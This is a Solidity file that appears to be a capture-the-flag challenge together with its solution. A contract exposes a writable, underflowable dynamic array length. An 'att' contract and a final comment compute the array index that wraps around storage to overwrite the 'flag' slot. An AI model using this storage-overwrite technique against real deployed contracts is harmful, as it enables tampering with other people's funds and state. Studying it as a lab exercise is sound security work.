
pragma solidity ^0.4.24;
contract array2{
    bool public flag;
    uint256[] public array;

    function addElement(uint256 index,uint256 value)public{
        if(index>=array.length){
            array.length=index+1;
        }
        array[index] = value;
    }

    function deleteElement()public{
        require(array.length>0);
        array.length--;
    }

    function getArrayLength()public view returns(uint256){
        return array.length;
    }


}
contract check{
    uint256 public score;
    array2 public arr;
    constructor()public{
        arr = new array2();
    }

    function isCompleted()public{
        score=0;
        if (arr.getArrayLength()>100000000000000000){
            score+=50;
        }
        if (arr.flag()==true){
            score+=50;
        }
    }
}
contract att
{
    uint256 public i=2**256-1;
    bytes32 public f4= keccak256(abi.encodePacked(uint(1))); //计算solt1的地址
    uint public result = 2**256-1 - uint(f4) +1;//计算solt1与目标的距离
}
//35707666377435648211887908874984608119992236509074197713628505308453184860938
